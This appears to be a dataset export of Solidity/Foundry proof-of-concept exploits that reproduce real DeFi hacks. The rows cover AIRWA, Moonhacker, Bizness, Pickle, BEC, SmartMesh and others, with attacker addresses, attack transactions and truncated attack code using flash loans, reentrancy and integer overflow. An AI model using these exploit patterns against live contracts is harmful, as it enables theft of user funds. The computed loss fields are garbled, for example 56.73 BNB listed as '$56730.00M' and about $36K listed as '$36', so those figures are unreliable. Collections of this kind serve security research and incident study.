source_code
stringlengths
878
31.2k
type
stringclasses
1 value
protocol
stringlengths
2
33
date
stringclasses
70 values
file_name
stringlengths
10
41
attack_vector
stringclasses
4 values
content_hash
stringlengths
16
16
collected_at
stringdate
2026-01-07 10:59:16
2026-01-07 10:59:16
_source
stringclasses
1 value
chain
stringclasses
8 values
block_number
int64
1.11M
356M
total_lost_raw
stringlengths
3
127
total_lost_usd
float64
0
19,026B
attacker_address
stringlengths
65
82
attack_contract
stringlengths
70
89
vulnerable_contract
stringlengths
68
82
attack_tx
stringlengths
89
115
postmortem_url
stringclasses
85 values
twitter_url
stringlengths
48
62
has_keyinfo
bool
2 classes
has_analysis
bool
2 classes
has_attack_vector
bool
2 classes
severity
stringclasses
4 values
severity_raw
stringlengths
3
127
category
stringclasses
5 values
exploit_code
stringlengths
0
25.5k
has_exploit_code
bool
2 classes
keyinfo_total_lost
stringlengths
0
127
keyinfo_attacker
stringlengths
0
82
keyinfo_attack_contract
stringlengths
0
89
keyinfo_vulnerable_contract
stringlengths
0
82
keyinfo_attack_tx
stringlengths
0
115
analysis_postmortem
stringclasses
82 values
analysis_twitter
stringlengths
0
62
funds_lost_formatted
stringlengths
2
13
content_richness_score
float64
0.63
10
quality_estimate
stringclasses
3 values
title
stringlengths
20
51
has_total_lost
bool
2 classes
has_vulnerable_contract
bool
2 classes
has_attack_tx
bool
2 classes
has_postmortem
bool
2 classes
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 56.73 BNB // Attacker : https://bscscan.com/address/0x70f0406e0a50c53304194b2668ec853d664a3d9c // Attack Contract : https://bscscan.com/address/0x2a011580f1b1533006967bd6dc6...
exploit_poc
AIRWA
2025-04
AIRWA_exp.sol
null
063836f0bc407397
2026-01-07T10:59:16.545010
postmortems
bsc
null
~ 56.73 BNB
56,730,000,000
https://bscscan.com/address/0x70f0406e0a50c53304194b2668ec853d664a3d9c
https://bscscan.com/address/0x2a011580f1b1533006967bd6dc63af7ae5c82363
https://bscscan.com/address/0x3af7da38c9f68df9549ce1980eef4ac6b635223a
https://bscscan.com/tx/0x5cf050cba486ec48100d5e5ad716380660e8c984d80f73ba888415bb540851a4
null
https://x.com/TenArmorAlert/status/1908086092772900909
true
true
false
critical
~ 56.73 BNB
unknown
function testExploit() public { emit log_named_decimal_uint("BNB balance before attack", attacker.balance, 18); vm.startPrank(attacker); AttackContract attackContract = new AttackContract{value: 0.1 ether}(); attackContract.attack(); vm.stopPrank(); emit log_named_decimal...
true
~ 56.73 BNB
https://bscscan.com/address/0x70f0406e0a50c53304194b2668ec853d664a3d9c
https://bscscan.com/address/0x2a011580f1b1533006967bd6dc63af7ae5c82363
https://bscscan.com/address/0x3af7da38c9f68df9549ce1980eef4ac6b635223a
https://bscscan.com/tx/0x5cf050cba486ec48100d5e5ad716380660e8c984d80f73ba888415bb540851a4
https://x.com/TenArmorAlert/status/1908086092772900909
$56730.00M
7.97
medium
AIRWA Exploit (2025-04)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 777k USD // Attacker : 0x8149f77504007450711023cf0ec11bdd6348401f // Attack Contract : // Vulnerable Contract : // Attack Tx : https://app.blocksec.com/explorer/tx/eth/0xab2097bb3ce666493d0f76179f7206926adc8c...
exploit_poc
Roar
2025-04
Roar_exp.sol
null
2f3dc3ac1b33cfae
2026-01-07T10:59:16.545064
postmortems
unknown
22,278,564
777k USD
777,000
null
null
null
https://app.blocksec.com/explorer/tx/eth/0xab2097bb3ce666493d0f76179f7206926adc8cec4ba16e88aed30c202d70c661
https://x.com/CertiKAlert/status/1912430535999189042
https://x.com/CertiKAlert/status/1912430535999189042
true
true
false
high
777k USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0xb0415D55f2C87b7f99285848bd341C367FeAc1ea).balanceOf(attacker), 18); emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x13028E6b95520ad16898396667d1e52cB5E550Ac).balanceOf(attack...
true
777k USD
https://app.blocksec.com/explorer/tx/eth/0xab2097bb3ce666493d0f76179f7206926adc8cec4ba16e88aed30c202d70c661
https://x.com/CertiKAlert/status/1912430535999189042
https://x.com/CertiKAlert/status/1912430535999189042
$777.0K
6.9
medium
Roar Exploit (2025-04)
true
false
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 1.5K USD // Attacker : https://etherscan.io/address/0xd6be07499d408454d090c96bd74a193f61f706f4 // Attack Contract : https://etherscan.io/address/0x2e95cfc93ebb0a2aace603ed3474d451e4161578 // Vulnerable Contract...
exploit_poc
Laundromat
2025-04
Laundromat_exp.sol
null
9b9c6c3420756576
2026-01-07T10:59:16.545121
postmortems
ethereum
22,222,687
1.5K USD
1,500
https://etherscan.io/address/0xd6be07499d408454d090c96bd74a193f61f706f4
https://etherscan.io/address/0x2e95cfc93ebb0a2aace603ed3474d451e4161578
https://etherscan.io/address/0x934cbbe5377358e6712b5f041d90313d935c501c
https://app.blocksec.com/explorer/tx/eth/0x08ffb5f7ab6421720ab609b6ab0ff5622fba225ba351119c21ef92c78cb8302c
https://x.com/TenArmorAlert/status/1909814943290884596
https://x.com/TenArmorAlert/status/1909814943290884596
true
true
false
low
1.5K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); vm.stopPrank(); emit log_named_decimal_uint("after attack: balance of attacker", addr...
true
1.5K USD
https://etherscan.io/address/0xd6be07499d408454d090c96bd74a193f61f706f4
https://etherscan.io/address/0x2e95cfc93ebb0a2aace603ed3474d451e4161578
https://etherscan.io/address/0x934cbbe5377358e6712b5f041d90313d935c501c
https://app.blocksec.com/explorer/tx/eth/0x08ffb5f7ab6421720ab609b6ab0ff5622fba225ba351119c21ef92c78cb8302c
https://x.com/TenArmorAlert/status/1909814943290884596
https://x.com/TenArmorAlert/status/1909814943290884596
$1.5K
8.28
high
Laundromat Exploit (2025-04)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost :  318.9 k // Attacker : https://optimistic.etherscan.io/address/0x36491840ebcf040413003df9fb65b6bc9a181f52 // Attack Contract1 : https://optimistic.etherscan.io/address/0x4e25...
exploit_poc
Moonhacker
2024-12
Moonhacker_exp.sol
flash_loan
16409cd09aeb4155
2026-01-07T10:59:16.545193
postmortems
ethereum
null
318.9 k
318,900
https://optimistic.etherscan.io/address/0x36491840ebcf040413003df9fb65b6bc9a181f52
null
https://optimistic.etherscan.io/address/0xd9b45e2c389b6ad55dd3631abc1de6f2d2229847
https://optimistic.etherscan.io/tx/0xd12016b25d7aef681ade3dc3c9d1a1cc12f35b2c99953ff0e0ee23a59454c4fe
https://blog.solidityscan.com/moonhacker-vault-hack-analysis-ab122cb226f6
https://x.com/quillaudits_ai/status/1871607695700296041
true
true
true
high
318.9 k
flash-loan
function testExploit() public balanceLog { Attacker attacker = new Attacker(); attacker.attack(); attacker.getProfit(); } } contract Attacker { IAaveFlashloan aaveV3 = IAaveFlashloan(0x794a61358D6845594F94dc1DB02A252b5b4814aD); IMusdc mUSDC = IMusdc(0x8E08617b0d66359D73Aa11E11017834...
true
318.9 k
https://optimistic.etherscan.io/address/0x36491840ebcf040413003df9fb65b6bc9a181f52
https://optimistic.etherscan.io/address/0xd9b45e2c389b6ad55dd3631abc1de6f2d2229847
https://optimistic.etherscan.io/tx/0xd12016b25d7aef681ade3dc3c9d1a1cc12f35b2c99953ff0e0ee23a59454c4fe
https://blog.solidityscan.com/moonhacker-vault-hack-analysis-ab122cb226f6
https://x.com/quillaudits_ai/status/1871607695700296041
$318.9K
10
high
Moonhacker Exploit (2024-12)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 15K // Attacker : https://bscscan.com/address/0x59367b057055fd5d38ab9c5f0927f45dc2637390 // Attack Contract : https://bscscan.com/address/0x4aa0548019bfecd343179d054b1c7fa63e1e0b6c // Vulnerable Contra...
exploit_poc
Pledge
2024-12
Pledge_exp.sol
null
c7d853e0c4086503
2026-01-07T10:59:16.545254
postmortems
bsc
null
15K
15,000
https://bscscan.com/address/0x59367b057055fd5d38ab9c5f0927f45dc2637390
https://bscscan.com/address/0x4aa0548019bfecd343179d054b1c7fa63e1e0b6c
https://bscscan.com/address/0x061944c0f3c2d7dabafb50813efb05c4e0c952e1
https://bscscan.com/tx/0x63ac9bc4e53dbcfaac3a65cb90917531cfdb1c79c0a334dda3f06e42373ff3a0
null
null
true
true
false
medium
15K
unknown
function testExploit() public balanceLog { uint256 amount = IERC20(MFT).balanceOf(pledge); address _target = address(this); IPledge(pledge).swapTokenU(amount, _target); }
true
15K
https://bscscan.com/address/0x59367b057055fd5d38ab9c5f0927f45dc2637390
https://bscscan.com/address/0x4aa0548019bfecd343179d054b1c7fa63e1e0b6c
https://bscscan.com/address/0x061944c0f3c2d7dabafb50813efb05c4e0c952e1
https://bscscan.com/tx/0x63ac9bc4e53dbcfaac3a65cb90917531cfdb1c79c0a334dda3f06e42373ff3a0
$15.0K
6.77
medium
Pledge Exploit (2024-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 4,953 USDT + 0.76 WBTC ($85.7K) // Attacker : https://polygonscan.com/address/0xde0a99fb39e78efd3529e31d78434f7645601163 // Attack Contract : https://polygonscan.com/addres...
exploit_poc
BTC24H
2024-12
BTC24H_exp.sol
null
37d7e68ad9d36f83
2026-01-07T10:59:16.545300
postmortems
polygon
null
~ 4,953 USDT + 0.76 WBTC ($85.7K)
4
https://polygonscan.com/address/0xde0a99fb39e78efd3529e31d78434f7645601163
https://polygonscan.com/address/0x3cb2452c615007b9ef94d5814765eb48b71ae520
https://polygonscan.com/address/0x968e1c984a431f3d0299563f15d48c395f70f719
https://polygonscan.com/tx/0x554c9e4067e3bc0201ba06fc2cfeeacd178d7dd9c69f9b211bc661bb11296fde
null
https://x.com/TenArmorAlert/status/1868845296945426760
true
true
false
low
~ 4,953 USDT + 0.76 WBTC ($85.7K)
unknown
function testExploit() public { address attacker = 0xDE0A99Fb39E78eFd3529e31D78434f7645601163; emit log_named_decimal_uint("[Before] USDT", TokenHelper.getTokenBalance(USDT_ADDR, attacker), 6); emit log_named_decimal_uint("[Before] WBTC", TokenHelper.getTokenBalance(WBTC, attacker), 8); ...
true
~ 4,953 USDT + 0.76 WBTC ($85.7K)
https://polygonscan.com/address/0xde0a99fb39e78efd3529e31d78434f7645601163
https://polygonscan.com/address/0x3cb2452c615007b9ef94d5814765eb48b71ae520
https://polygonscan.com/address/0x968e1c984a431f3d0299563f15d48c395f70f719
https://polygonscan.com/tx/0x554c9e4067e3bc0201ba06fc2cfeeacd178d7dd9c69f9b211bc661bb11296fde
https://x.com/TenArmorAlert/status/1868845296945426760
$4
8.26
high
BTC24H Exploit (2024-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import '../interface.sol'; // @KeyInfo - Total Lost : 15.7k USD // Attacker : https://basescan.org/address/0x3cc1edd8a25c912fcb51d7e61893e737c48cd98d // Attack Contract : https://basescan.org/address/0x0f30ae8f41a5d3cc96abd07adf...
exploit_poc
Bizness
2024-12
Bizness_exp.sol
reentrancy
18fbb819c13768b8
2026-01-07T10:59:16.545351
postmortems
base
null
15.7k USD
15,700
https://basescan.org/address/0x3cc1edd8a25c912fcb51d7e61893e737c48cd98d
https://basescan.org/address/0x0f30ae8f41a5d3cc96abd07adf1550a9a0e557b5
https://basescan.org/address/0xd6a7cfa86a41b8f40b8dfeb987582a479eb10693
https://basescan.org/tx/0x984cb29cdb4e92e5899e9c94768f8a34047d0e1074f9c4109364e3682e488873
null
https://x.com/TenArmorAlert/status/1872857132363645205
true
true
true
medium
15.7k USD
reentrancy
function testExploit() public balanceLog { ILocker locker = ILocker(LOCKER); Lock memory lockBefore = locker.locks(lockId); console.log("lockBefore.amount ", lockBefore.amount); // Step 1: Split the lock to trigger reentrancy uint256 newSplitId = locker.splitLock{value: 0.011 et...
true
15.7k USD
https://basescan.org/address/0x3cc1edd8a25c912fcb51d7e61893e737c48cd98d
https://basescan.org/address/0x0f30ae8f41a5d3cc96abd07adf1550a9a0e557b5
https://basescan.org/address/0xd6a7cfa86a41b8f40b8dfeb987582a479eb10693
https://basescan.org/tx/0x984cb29cdb4e92e5899e9c94768f8a34047d0e1074f9c4109364e3682e488873
https://x.com/TenArmorAlert/status/1872857132363645205
$15.7K
8.51
high
Bizness Exploit (2024-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 3k USD // Attacker : https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138 // Attack Contract : https://bscscan.com/address/0x051e057ea275caf9a73578a97af6e89...
exploit_poc
SlurpyCoin
2024-12
SlurpyCoin_exp.sol
flash_loan
c9a528c2977ab011
2026-01-07T10:59:16.545398
postmortems
bsc
null
3k USD
3,000
https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138
https://bscscan.com/address/0x051e057ea275caf9a73578a97af6e8965e5a2349
https://bscscan.com/address/0x72c114A1A4abC65BE2Be3E356eEde296Dbb8ba4c
https://bscscan.com/tx/0x6c729ee778332244de099ba0cb68808fcd7be4a667303fcdf2f54dd4b3d29051
null
https://x.com/CertiKAlert/status/1869580379675590731
true
true
true
low
3k USD
flash-loan
function testExploit() public balanceLog { // Step 1: borrow 40 WBNB from DODO IDodo(DODO_ADDR).flashLoan(40 ether, 0, address(this), hex"00"); }
true
3k USD
https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138
https://bscscan.com/address/0x051e057ea275caf9a73578a97af6e8965e5a2349
https://bscscan.com/address/0x72c114A1A4abC65BE2Be3E356eEde296Dbb8ba4c
https://bscscan.com/tx/0x6c729ee778332244de099ba0cb68808fcd7be4a667303fcdf2f54dd4b3d29051
https://x.com/CertiKAlert/status/1869580379675590731
$3.0K
9.64
high
SlurpyCoin Exploit (2024-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ $501 K US$ (133.7 WETH) // Attacker : https://basescan.org/address/0x012Fc6377F1c5CCF6e29967Bce52e3629AaA6025 // Attack Contract : https://basescan.org/address/0x32Fb1BedD9...
exploit_poc
CloberDEX
2024-12
CloberDEX_exp.sol
flash_loan
1400dec5e6f04467
2026-01-07T10:59:16.545459
postmortems
base
null
~ $501 K US$ (133.7 WETH)
501,000
https://basescan.org/address/0x012Fc6377F1c5CCF6e29967Bce52e3629AaA6025
https://basescan.org/address/0x32Fb1BedD95BF78ca2c6943aE5AEaEAAFc0d97C1
https://basescan.org/address/0x6A0b87D6b74F7D5C92722F6a11714DBeDa9F3895
https://basescan.org/tx/0x8fcdfcded45100437ff94801090355f2f689941dca75de9a702e01670f361c04
null
null
true
true
true
high
~ $501 K US$ (133.7 WETH)
flash-loan
function testRealAttacker() public { emit log_named_decimal_uint("The Real Attacker's ETH before the attack:", address(attacker).balance / 1e18, 0); vm.createSelectFork("base", blocknumToForkFrom + 1); emit log_named_decimal_uint("The Real Attacker's ETH after the attack:", address(attacker).bal...
true
~ $501 K US$ (133.7 WETH)
https://basescan.org/address/0x012Fc6377F1c5CCF6e29967Bce52e3629AaA6025
https://basescan.org/address/0x32Fb1BedD95BF78ca2c6943aE5AEaEAAFc0d97C1
https://basescan.org/address/0x6A0b87D6b74F7D5C92722F6a11714DBeDa9F3895
https://basescan.org/tx/0x8fcdfcded45100437ff94801090355f2f689941dca75de9a702e01670f361c04
$501.0K
10
high
CloberDEX Exploit (2024-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 17.4 BNB (~ $12,048) // Attacker : https://bscscan.com/address/0x27441c62dbe261fdf5e1feec7ed19cf6820d583b // Attack Contract : https://bscscan.com/address/0x2ff0cc42e51353...
exploit_poc
LABUBU
2024-12
LABUBU_exp.sol
null
38c47d7bebea3db9
2026-01-07T10:59:16.545535
postmortems
bsc
44,751,945
17.4 BNB (~ $12,048)
17,400,000,000
https://bscscan.com/address/0x27441c62dbe261fdf5e1feec7ed19cf6820d583b
https://bscscan.com/address/0x2ff0cc42e513535bd56be20c3e686a58608260ca
https://bscscan.com/address/0x2ff960f1d9af1a6368c2866f79080c1e0b253997#code
https://bscscan.com/tx/0xb06df371029456f2bf2d2edb732d1f3c8292d4271d362390961fdcc63a2382de
null
https://x.com/TenArmorAlert/status/1866481066610958431
true
true
false
critical
17.4 BNB (~ $12,048)
unknown
function testPoC() public { vm.startPrank(attacker); AttackerC attC = new AttackerC(); attC.attack(); emit log_named_decimal_uint("Profit in BNB", attacker.balance, 18); vm.stopPrank(); } } contract AttackerC { address public immutable owner; constructor() { ...
true
17.4 BNB (~ $12,048)
https://bscscan.com/address/0x27441c62dbe261fdf5e1feec7ed19cf6820d583b
https://bscscan.com/address/0x2ff0cc42e513535bd56be20c3e686a58608260ca
https://bscscan.com/address/0x2ff960f1d9af1a6368c2866f79080c1e0b253997#code
https://bscscan.com/tx/0xb06df371029456f2bf2d2edb732d1f3c8292d4271d362390961fdcc63a2382de
https://x.com/TenArmorAlert/status/1866481066610958431
$17400.00M
8.41
high
LABUBU Exploit (2024-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 11k USD // Attacker : https://bscscan.com/address/0x00000000dd0412366388639b1101544fff2dce8d // Attack Contract : https://bscscan.com/address/0x802a389072c4310cf78a2e654fa50f...
exploit_poc
JHY
2024-12
JHY_exp.sol
null
6791f708796f249c
2026-01-07T10:59:16.545601
postmortems
bsc
null
11k USD
11,000
https://bscscan.com/address/0x00000000dd0412366388639b1101544fff2dce8d
https://bscscan.com/address/0x802a389072c4310cf78a2e654fa50fac8bdc1a55
https://bscscan.com/address/0x40Cd735D49e43212B5cb0b19773Ec2A648aAA96c
https://bscscan.com/tx/0xb6a9055e3ce7f006391760fbbcc4e4bc8df8228dc47a8bb4ff657370ccc49256
null
https://x.com/TenArmorAlert/status/1867950089156575317
true
true
false
medium
11k USD
unknown
function testExploit() public balanceLog { //implement exploit code here AttackContract1 attackContract1 = new AttackContract1(); attackContract1.attack(); } } contract AttackContract1 { address public attacker; constructor() { attacker = msg.sender; }
true
11k USD
https://bscscan.com/address/0x00000000dd0412366388639b1101544fff2dce8d
https://bscscan.com/address/0x802a389072c4310cf78a2e654fa50fac8bdc1a55
https://bscscan.com/address/0x40Cd735D49e43212B5cb0b19773Ec2A648aAA96c
https://bscscan.com/tx/0xb6a9055e3ce7f006391760fbbcc4e4bc8df8228dc47a8bb4ff657370ccc49256
https://x.com/TenArmorAlert/status/1867950089156575317
$11.0K
8.86
high
JHY Exploit (2024-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface BECToken { function balanceOf( address account ) external view returns (uint256); functio...
exploit_poc
BEC
2018-04
BEC_exp.sol
null
6fd293f1e1c467d0
2026-01-07T10:59:16.545655
postmortems
ethereum
5,483,642
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint("Before Exploit, Attacker1 BEC Balance", bec.balanceOf(attacker1), 18); emit log_named_decimal_uint("Before Exploit, Attacker2 BEC Balance", bec.balanceOf(attacker2), 18); address[] memory receivers = new address[](2); receiver...
true
Unknown
2.84
low
BEC Exploit (2018-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 140M // Attacker : https://etherscan.io/address/0xd6a09bdb29e1eafa92a30373c44b09e2e2e0651e // Vulnerable Contract : https://etherscan.io/address/0x55f93985431fc9304077687a35a1ba103dc1e081 // Attack Tx ...
exploit_poc
SmartMesh
2018-04
SmartMesh_exp.sol
null
dc006fab9fca668b
2026-01-07T10:59:16.545696
postmortems
ethereum
null
140M
140,000,000
https://etherscan.io/address/0xd6a09bdb29e1eafa92a30373c44b09e2e2e0651e
null
https://etherscan.io/address/0x55f93985431fc9304077687a35a1ba103dc1e081
https://etherscan.io/tx/0x1abab4c8db9a30e703114528e31dee129a3a758f7f8abc3b6494aad3d304e43f
https://cryptojobslist.com/blog/two-vulnerable-erc20-contracts-deep-dive-beautychain-smartmesh
null
true
true
false
critical
140M
unknown
function testExploit() public balanceLog { address _from = 0xDF31A499A5A8358b74564f1e2214B31bB34Eb46F; address _to = 0xDF31A499A5A8358b74564f1e2214B31bB34Eb46F; uint256 _value = uint256(0x8fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff); uint256 _feeSmt = uint256(0x70000...
true
140M
https://etherscan.io/address/0xd6a09bdb29e1eafa92a30373c44b09e2e2e0651e
https://etherscan.io/address/0x55f93985431fc9304077687a35a1ba103dc1e081
https://etherscan.io/tx/0x1abab4c8db9a30e703114528e31dee129a3a758f7f8abc3b6494aad3d304e43f
https://cryptojobslist.com/blog/two-vulnerable-erc20-contracts-deep-dive-beautychain-smartmesh
$140.00M
7.09
medium
SmartMesh Exploit (2018-04)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : around 20 million DAI. // Attacker : 0xbac8a476b95ec741e56561a66231f92bc88bb3a8 // AttackContract : 0x2b0b02ce19c322b4dd55a3949b4fb6e9377f7913#code // Attack TX: https:/...
exploit_poc
Pickle
2020-11
Pickle_exp.sol
null
946d7bd20228980e
2026-01-07T10:59:16.545749
postmortems
ethereum
11,303,122
around 20 million DAI.
20,000,000
null
null
null
https://etherscan.io/tx/0xe72d4e7ba9b5af0cf2a8cfb1e30fd9f388df0ab3da79790be842bfbed11087b0
null
null
true
false
false
critical
around 20 million DAI.
unknown
function testExploit() public { uint256 earns = 5; address[] memory targets = new address[](earns + 2); bytes[] memory datas = new bytes[](earns + 2); for (uint256 i = 0; i < earns + 2; i++) { targets[i] = address(CURVE_LOGIC); } datas[0] = arbitraryCall(STRA...
true
around 20 million DAI.
$20.00M
7.53
medium
Pickle Exploit (2020-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~36,044 US$ // Attacker : 0xee0221d76504aec40f63ad7e36855eebf5ea5edd // Attack Contract : 0xc30808d9373093fbfcec9e026457c6a9dab706a7 // Vulnerable Contract : 0x34bd6dba4...
exploit_poc
EGD_Finance
2022-08
EGD_Finance_exp.sol
flash_loan
76f23fb6faca071b
2026-01-07T10:59:16.545807
postmortems
bsc
20,245,522
~36,044 US$
36
null
null
null
https://bscscan.com/tx/0x50da0b1b6e34bce59769157df769eb45fa11efc7d0e292900d6b0a86ae66a2b3
null
null
true
true
true
low
~36,044 US$
flash-loan
function testExploit() public { Exploit exploit = new Exploit(); console.log("-------------------- Pre-work, stake 100 USDT to EGD Finance --------------------"); console.log("Tx: 0x4a66d01a017158ff38d6a88db98ba78435c606be57ca6df36033db4d9514f9f8"); console.log("Attacker Stake 100 USDT...
true
~36,044 US$
https://bscscan.com/tx/0x50da0b1b6e34bce59769157df769eb45fa11efc7d0e292900d6b0a86ae66a2b3
$36
9
high
EGD_Finance Exploit (2022-08)
true
false
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~3074 USD // TX : https://app.blocksec.com/explorer/tx/bsc/0x72321a3b50bb68ac3b46b0ab973b0e87b6c48ab73d23c4ba2cb73527f978d995 // Attacker : https://bscscan.com/address/0xde703797fe9219b0485fb31eda627aa182b16...
exploit_poc
EtnProduct
2022-08
EtnProduct_exp.sol
flash_loan
89baf6378ac8102d
2026-01-07T10:59:16.545867
postmortems
bsc
20,147,974
~3074 USD
3,074
https://bscscan.com/address/0xde703797fe9219b0485fb31eda627aa182b1601e
https://bscscan.com/address/0x178bf96e303fb31aef1b586271a63acd33e4eaf7
null
null
null
null
true
false
true
low
~3074 USD
flash-loan
false
https://bscscan.com/address/0xde703797fe9219b0485fb31eda627aa182b1601e
https://bscscan.com/address/0x178bf96e303fb31aef1b586271a63acd33e4eaf7
$3.1K
4.96
low
EtnProduct Exploit (2022-08)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/AnciliaInc/status/1557846766682140672 // @Contract address // https://bscscan.com/address/0xa4f5d4afd6b9226b3004dd276a9f778eb75f2e9e#code contract ContractTest...
exploit_poc
ANCH
2022-08
ANCH_exp.sol
flash_loan
3cab9284c277846c
2026-01-07T10:59:16.545914
postmortems
bsc
20,302,534
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { USDT.approve(address(Router), type(uint256).max); ANCH.approve(address(Router), type(uint256).max); DVM(dodo).flashLoan(0, 50_000 * 1e18, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT.balanceOf...
true
Unknown
4.18
low
ANCH Exploit (2022-08)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; //import "./../interface.sol"; interface CheatCodes { function createSelectFork(string calldata, uint256) external returns (uint256); } interface IERC20 { function balanceOf( address owner ) external view returns (uint256); function approv...
exploit_poc
DDC
2022-08
DDC_exp.sol
null
5b2edaf9ad7e6276
2026-01-07T10:59:16.545960
postmortems
unknown
20,840,079
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.47
low
DDC Exploit (2022-08)
false
false
false
false
// SPDX-License-Identifier: GPL-3.0 pragma solidity ^0.8.13; import "forge-std/Test.sol"; /* Attacker: 0x3392c91403f09ad3b7e7243dbd4441436c7f443c Attack tx: https://etherscan.io/tx/0x804ff3801542bff435a5d733f4d8a93a535d73d0de0f843fd979756a7eab26af poc refers to: https://github.com/0xNezha/luckyHack */ i...
exploit_poc
LuckyTiger
2022-08
LuckyTiger_exp.sol
null
ea4a3374aa48e473
2026-01-07T10:59:16.546003
postmortems
ethereum
15,403,430
null
null
null
null
null
https://etherscan.io/tx/0x804ff3801542bff435a5d733f4d8a93a535d73d0de0f843fd979756a7eab26af
null
null
false
false
false
medium
null
unknown
function testExploit() public { vm.warp(1_661_351_167); console.log("getRandom", getRandom()); uint256 amount = 10; if (uint256(keccak256(abi.encodePacked(block.difficulty, block.timestamp))) % 2 == 0) { revert("Not lucky"); } bytes memory data = abi.encodeW...
true
Unknown
4.02
low
LuckyTiger Exploit (2022-08)
false
false
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~6.8 BNB // TX : https://app.blocksec.com/explorer/tx/bsc/0x16be4fe1c8fcab578fcb999cbc40885ba0d4ba9f3782a67bd215fb56dc579062 // Attacker : https://bscscan.com/address/0x2723e1f6a9a3cd003fd395cc46882e4573cb24...
exploit_poc
Qixi
2022-08
Qixi_exp.sol
null
b71792bd12984393
2026-01-07T10:59:16.546045
postmortems
bsc
20,120,884
~6.8 BNB
6,800,000,000
https://bscscan.com/address/0x2723e1f6a9a3cd003fd395cc46882e4573cb249f
https://bscscan.com/address/0xb7b0fe129fefa222efd4eb1f6bef9de339339bbb
null
null
null
null
true
false
false
critical
~6.8 BNB
unknown
false
https://bscscan.com/address/0x2723e1f6a9a3cd003fd395cc46882e4573cb249f
https://bscscan.com/address/0xb7b0fe129fefa222efd4eb1f6bef9de339339bbb
$6800.00M
2.71
low
Qixi Exploit (2022-08)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~1.7M US$ // Attacker : 0x5636e55e4a72299a0f194c001841e2ce75bb527a (ReaperFarm Exploiter 1 - who trigger the exploit) // Attacker : 0x2c177d20b1b1d68cc85d3215904a7bb6629...
exploit_poc
ReaperFarm
2022-08
ReaperFarm_exp.sol
null
591aaa3a64b96251
2026-01-07T10:59:16.546086
postmortems
fantom
44,045,899
~1.7M US$
1,700,000
null
null
null
null
https://twitter.com/Reaper_Farm/status/1554500909740302337
null
true
true
false
critical
~1.7M US$
unknown
function testExploit() public { address victim = 0x59cb9F088806E511157A6c92B293E5574531022A; emit log_named_decimal_uint("Victim ReaperUSDCVault balance", ReaperVault.balanceOf(victim), 6); emit log_named_decimal_uint("Attacker USDC balance", USDC.balanceOf(address(this)), 6); console.l...
true
~1.7M US$
$1.70M
5.31
medium
ReaperFarm Exploit (2022-08)
true
false
false
true
